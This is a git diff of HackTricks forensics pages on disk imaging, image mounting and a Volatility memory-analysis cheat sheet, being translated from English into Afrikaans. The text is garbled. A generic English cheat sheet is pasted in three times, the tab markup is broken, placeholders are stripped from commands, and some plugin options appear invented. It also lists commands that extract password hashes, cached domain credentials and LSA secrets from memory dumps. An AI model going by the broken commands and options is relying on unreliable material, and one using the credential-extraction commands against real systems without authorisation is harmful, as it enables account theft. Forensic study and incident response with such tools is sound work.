-## Acquisition +## Verwerwing ### DD - ```bash #This will generate a raw copy of the disk dd if=/dev/sdb of=disk.img ``` - ### dcfldd +dcfldd is a command-line tool that is used for creating and hashing disk images. It is an enhanced version of the dd command and provides additional features such as on-the-fly hashing, progress reporting, and error handling. + +To use dcfldd, you need to specify the input and output files or devices. You can also specify options such as block size, hash algorithm, and progress reporting interval. + +Here is an example command to create a disk image using dcfldd: + +``` +dcfldd if=/dev/sda of=image.dd bs=4M hash=md5 hashwindow=10M hashlog=image.md5.log statusinterval=1MB +``` + +In this example, we are creating a disk image from the /dev/sda device and saving it as image.dd. We are using a block size of 4MB and hashing the image using the MD5 algorithm. The hash window is set to 10MB, which means that the hash is calculated for every 10MB of data. The hash log is saved in the image.md5.log file. The status interval is set to 1MB, which means that progress is reported every 1MB. + +dcfldd is a powerful tool that can be used for forensic imaging and data acquisition. It is widely used in the field of digital forensics and can help in preserving and analyzing evidence. ```bash #Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data) dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` - ### FTK Imager -You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). - +Jy kan die FTK imager [**hier aflaai**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). ```bash ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name' ``` - ### EWF -You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf). - +Jy kan 'n skyfbeeld genereer deur die [**ewf tools**](https://github.com/libyal/libewf) te gebruik. ```bash ewfacquire /dev/sdb #Name: evidence @@ -57,52 +64,56 @@ ewfacquire /dev/sdb #Then use default values #It will generate the disk image in the current directory ``` +## Monteer -## Mount +### Verskeie tipes -### Several types - -In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**. - -### Raw +In **Windows** kan jy probeer om die gratis weergawe van Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) te gebruik om **die forensiese beeld te monteer**. +### Rou ```bash #Get file type -file evidence.img +file evidence.img evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files) #Mount it mount evidence.img /mnt ``` - ### EWF +EWF (EnCase Evidence File) is a file format used for forensic disk imaging. It is commonly used in digital forensics to create a forensic image of a disk or a partition. The EWF format ensures the integrity and authenticity of the acquired image by storing a cryptographic hash of the data. + +To acquire an image using EWF, you can use tools like EnCase, FTK Imager, or ewfacquire. These tools allow you to create a bit-by-bit copy of the disk or partition, including both allocated and unallocated space. + +The EWF format has several advantages over other imaging formats. It supports compression, which can reduce the size of the acquired image. It also supports encryption, which can protect the image from unauthorized access. Additionally, EWF files can be easily mounted and accessed using tools like ewfmount. + +To mount an EWF file, you can use the ewfmount command followed by the path to the EWF file and the mount point. This will create a virtual disk that contains the contents of the EWF file, allowing you to access and analyze the data within. + +Overall, EWF is a reliable and widely used format for acquiring and analyzing disk images in digital forensics. Its support for compression, encryption, and easy mounting makes it a valuable tool for forensic investigators. ```bash #Get file type -file evidence.E01 +file evidence.E01 evidence.E01: EWF/Expert Witness/EnCase image file format #Transform to raw mkdir output ewfmount evidence.E01 output/ -file output/ewf1 +file output/ewf1 output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files) #Mount mount output/ewf1 -o ro,norecovery /mnt ``` - ### ArsenalImageMounter -It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) +Dit is 'n Windows-toepassing om volumes te monteer. Jy kan dit hier aflaai [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) -### Errors - -* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`** -* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector: +### Foute +* **`kan nie /dev/loop0 as slegs-lees monteer nie`** in hierdie geval moet jy die vlae **`-o ro,norecovery`** gebruik +* **`verkeerde fs-tipe, slegte opsie, slegte superblock op /dev/loop0, ontbrekende kodebladsy of hulpprogram, of ander fout.`** in hierdie geval het die monteer misluk as gevolg van die verskil in die verskuiwing van die lêersisteem en die skyfbeeld. Jy moet die Sektor-grootte en die Beginsektor vind: ```bash -fdisk -l disk.img +fdisk -l disk.img Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes @@ -113,21 +124,18 @@ Disk identifier: 0x00495395 Device Boot Start End Sectors Size Id Type disk.img1 2048 208895 206848 101M 1 FAT12 ``` - -Note that sector size is **512** and start is **2048**. Then mount the image like this: - +Let daarop dat die sektor grootte **512** is en die beginpunt is **2048**. Monteer dan die prent soos volg: ```bash mount disk.img /mnt -o ro,offset=$((2048*512)) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index 6b2f7bc97..aabc1cb12 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -1,16 +1,16 @@ -# Volatility - CheatSheet +# Volatility - Spiekbrief
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
@@ -18,37 +18,62 @@ Other ways to support HackTricks:
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) - +As jy iets **vinnig en mal** wil hê wat verskeie Volatility-plugins gelyktydig sal uitvoer, kan jy gebruik maak van: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) ```bash python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # It will use the most important plugins (could use a lot of space depending on the size of the memory) ``` - -## Installation +## Installasie ### volatility3 - ```bash git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 python3 setup.py install python3 vol.py —h ``` +#### Metode 1 -### volatility2 +Die eerste metode wat gebruik kan word om 'n geheue-dump te analiseer, is deur die gebruik van die `volatility2`-raamwerk. Hier is 'n paar nuttige opdragte wat gebruik kan word: -{% tabs %} -{% tab title="Method1" %} +##### Basiese opdragte + +- `imageinfo`: Hierdie opdrag gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Hierdie opdrag lys die aktiewe prosesse in die geheue-dump. +- `pstree`: Hierdie opdrag gee 'n boomstruktuur van die prosesse in die geheue-dump. +- `dlllist`: Hierdie opdrag lys die gelaai DLL's in die geheue-dump. +- `handles`: Hierdie opdrag gee 'n lys van die hanteerders in die geheue-dump. +- `filescan`: Hierdie opdrag soek na oop lêers in die geheue-dump. +- `cmdline`: Hierdie opdrag gee die opdraglyne van die prosesse in die geheue-dump. +- `vadinfo`: Hierdie opdrag gee inligting oor die virtuele adresruimtes in die geheue-dump. + +##### Gevorderde opdragte + +- `malfind`: Hierdie opdrag soek na verdagte kode in die geheue-dump. +- `apihooks`: Hierdie opdrag soek na API-hake in die geheue-dump. +- `ldrmodules`: Hierdie opdrag gee inligting oor die gelaai modules in die geheue-dump. +- `modscan`: Hierdie opdrag soek na verdagte modules in die geheue-dump. +- `ssdt`: Hierdie opdrag gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Hierdie opdrag soek na verdagte bestuurders in die geheue-dump. +- `mutantscan`: Hierdie opdrag soek na verdagte mutante in die geheue-dump. + +##### Voorbeeldopdragte + +- `volatility2 -f dump.raw imageinfo`: Voer die `imageinfo`-opdrag uit op die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw pslist`: Lys die aktiewe prosesse in die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw malfind`: Soek na verdagte kode in die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw ldrmodules`: Gee inligting oor die gelaai modules in die geheue-dump `dump.raw`. + +{% endtab %} + +{% tab title="Method2" %} ``` Download the executable from https://www.volatilityfoundation.org/26 ``` -{% endtab %} - -{% tab title="Method 2" %} +{% tab title="Metode 2" %} ```bash git clone https://github.com/volatilityfoundation/volatility.git cd volatility @@ -57,26 +82,26 @@ python setup.py install {% endtab %} {% endtabs %} -## Volatility Commands +## Volatility Opdragte -Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) +Kry toegang tot die amptelike dokumentasie in [Volatility-opdragverwysing](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan) -### A note on “list” vs. “scan” plugins +### 'n Nota oor "lys" vs. "skandering" invoegtoepassings -Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes. +Volatility het twee hoofbenaderings tot invoegtoepassings, wat soms weerspieël word in hul name. "Lys" invoegtoepassings sal probeer om deur Windows Kernel-strukture te navigeer om inligting soos prosesse op te haal (lokalisering en loop deur die gekoppelde lys van `_EPROCESS` strukture in die geheue), OS-hanteerders (lokalisering en lys van die hanteerdertabel, dereferensie van enige gevonde wysers, ens.). Hulle gedra hulle min of meer soos die Windows API sou doen as dit versoek sou word om byvoorbeeld prosesse te lys. -That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist. +Dit maak "lys" invoegtoepassings redelik vinnig, maar net so kwesbaar soos die Windows API vir manipulasie deur kwaadwillige sagteware. Byvoorbeeld, as kwaadwillige sagteware DKOM gebruik om 'n proses van die `_EPROCESS` gekoppelde lys af te koppel, sal dit nie in die Taakbestuurder verskyn nie en ook nie in die pslys nie. -“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make`_EPROCESS` objects out of it (it uses pool-tag scanning, which is searching for 4-byte strings that indicate the presence of a structure of interest). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory (since it still needs to exist for the process to run). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false positives (a process that exited too long ago and had parts of its structure overwritten by other operations). +"Skandering" invoegtoepassings daarenteen sal 'n benadering volg wat soortgelyk is aan die uitsny van die geheue vir dinge wat sin maak wanneer dit as spesifieke strukture gedereferensieer word. `psscan` sal byvoorbeeld die geheue lees en probeer om `_EPROCESS`-voorwerpe daaruit te maak (dit gebruik pool-tag-skandering, wat soek na 4-byte-reekse wat die teenwoordigheid van 'n belangrike struktuur aandui). Die voordeel is dat dit prosesse kan opgrawe wat beëindig is, en selfs as kwaadwillige sagteware met die `_EPROCESS` gekoppelde lys knoei, sal die invoegtoepassing steeds die struktuur in die geheue vind (aangesien dit steeds moet bestaan vir die proses om te loop). Die nadeel is dat "skandering" invoegtoepassings 'n bietjie stadiger as "lys" invoegtoepassings is, en soms vals positiewe resultate kan lewer ('n proses wat te lank gelede beëindig is en waarvan dele van die struktuur deur ander operasies oorskryf is). -From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) +Bron: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/) -## OS Profiles +## BS-profiel ### Volatility3 -As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\ -Symbol table packs for the various operating systems are available for **download** at: +Soos in die leesmyl verduidelik, moet jy die **simbooltabel van die BS** wat jy wil ondersteun, in _volatility3/volatility/symbols_ plaas.\ +Simbooltabelpakke vir die verskillende bedryfstelsels is beskikbaar vir **aflaai** by: * [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip) * [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip) @@ -84,16 +109,13 @@ Symbol table packs for the various operating systems are available for **downloa ### Volatility2 -#### External Profile - -You can get the list of supported profiles doing: +#### Eksterne profiel +Jy kan die lys van ondersteunde profiele kry deur die volgende te doen: ```bash ./volatility_2.6_lin64_standalone --info | grep "Profile" ``` - -If you want to use a **new profile you have downloaded** (for example a linux one) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using: - +As jy 'n **nuwe profiel wat jy afgelaai het** wil gebruik (byvoorbeeld 'n Linux-profiel), moet jy die volgende vouerstruktuur êrens skep: _plugins/overlays/linux_ en sit die zip-lêer wat die profiel bevat binne hierdie vouer. Kry dan die nommer van die profiele deur die volgende te gebruik: ```bash ./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info Volatility Foundation Volatility Framework 2.6 @@ -105,28 +127,22 @@ LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10 VistaSP0x64 - A Profile for Windows Vista SP0 x64 VistaSP0x86 - A Profile for Windows Vista SP0 x86 ``` +Jy kan **Linux en Mac profiele aflaai** vanaf [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) -You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles) - -In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, and you can use it to execute something like: - +In die vorige blok kan jy sien dat die profiel genoem word `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, en jy kan dit gebruik om iets soos die volgende uit te voer: ```bash ./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan ``` - -#### Discover Profile - +#### Ontdek Profiel ``` volatility imageinfo -f file.dmp volatility kdbgscan -f file.dmp ``` +#### **Verskille tussen imageinfo en kdbgscan** -#### **Differences between imageinfo and kdbgscan** - -[**From here**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and the number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it from . - -Always take a look at the **number of processes that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because to extract processes the correct KDBG address is needed) +[**Vanaf hier**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): In teenstelling met imageinfo wat slegs profielvoorstelle bied, is **kdbgscan** ontwerp om die korrekte profiel en die korrekte KDBG-adres positief te identifiseer (as daar dalk meer as een is). Hierdie invoegtoepassing skandeer vir die KDBGHeader-handtekeninge wat gekoppel is aan Volatility-profiels en pas sinvolheidskontroles toe om vals positiewe te verminder. Die uitvoer se oorvloedigheid en die aantal sinvolheidskontroles wat uitgevoer kan word, hang af van of Volatility 'n DTB kan vind. As jy reeds die korrekte profiel ken (of as jy 'n profielvoorstel van imageinfo het), moet jy seker maak dat jy dit gebruik. +Neem altyd 'n kykie na die **aantal prosesse wat kdbgscan gevind het**. Soms kan imageinfo en kdbgscan **meer as een geskikte profiel vind**, maar slegs die **geldige een sal enkele prosesse hê** (Dit is omdat die korrekte KDBG-adres nodig is om prosesse te onttrek). ```bash # GOOD PsActiveProcessHead : 0xfffff800011977f0 (37 processes) @@ -138,23 +154,20 @@ PsLoadedModuleList : 0xfffff8000119aae0 (116 modules) PsActiveProcessHead : 0xfffff800011947f0 (0 processes) PsLoadedModuleList : 0xfffff80001197ac0 (0 modules) ``` - #### KDBG -The **kernel debugger block**, referred to as **KDBG** by Volatility, is crucial for forensic tasks performed by Volatility and various debuggers. Identified as `KdDebuggerDataBlock` and of the type `_KDDEBUGGER_DATA64`, it contains essential references like `PsActiveProcessHead`. This specific reference points to the head of the process list, enabling the listing of all processes, which is fundamental for thorough memory analysis. - -## OS Information +Die **kernel debugger block**, bekend as **KDBG** deur Volatility, is noodsaaklik vir forensiese take wat deur Volatility en verskeie debuggers uitgevoer word. Dit word geïdentifiseer as `KdDebuggerDataBlock` en is van die tipe `_KDDEBUGGER_DATA64`. Dit bevat essensiële verwysings soos `PsActiveProcessHead`. Hierdie spesifieke verwysing wys na die kop van die proseslys, wat die lys van alle prosesse moontlik maak, wat fundamenteel is vir deeglike geheue-analise. +## Bedryfstelselinligting ```bash #vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info) ./vol.py -f file.dmp windows.info.Info ``` +Die invoegtoepassing `banners.Banners` kan gebruik word in **vol3 om Linux-banners** in die dump te probeer vind. -The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump. +## Hasse/Wagwoorde -## Hashes/Passwords - -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). +Onttrek SAM-hashe, [gekasteerde geloofsbriewe van die domein](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) en [lsa-geheime](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). {% tabs %} {% tab title="vol3" %} @@ -163,9 +176,80 @@ Extract SAM hashes, [domain cached credentials](../../../windows-hardening/steal ./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry ./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM) volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry @@ -174,28 +258,24 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets {% endtab %} {% endtabs %} -## Memory Dump - -The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**. +## Geheue Dump +Die geheue dump van 'n proses sal **alles onttrek** van die huidige status van die proses. Die **procdump** module sal slegs die **kode onttrek**. ``` volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` - -​ -
-​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Processes +## Prosesse -### List processes +### Lys prosesse -Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\ -It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes. +Probeer om **verdagte** prosesse (volgens naam) of **onverwagte** kinderprosesse (byvoorbeeld 'n cmd.exe as 'n kind van iexplorer.exe) te vind.\ +Dit kan interessant wees om die resultaat van pslist te vergelyk met dié van psscan om verborge prosesse te identifiseer. {% tabs %} {% tab title="vol3" %} @@ -204,9 +284,80 @@ python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidde python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS) python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware) ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network sockets, such as local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port number, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a starting point for using Volatility and performing common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden) volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS) @@ -216,34 +367,135 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list {% endtab %} {% endtabs %} -### Dump proc +### Stortingsproses {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. 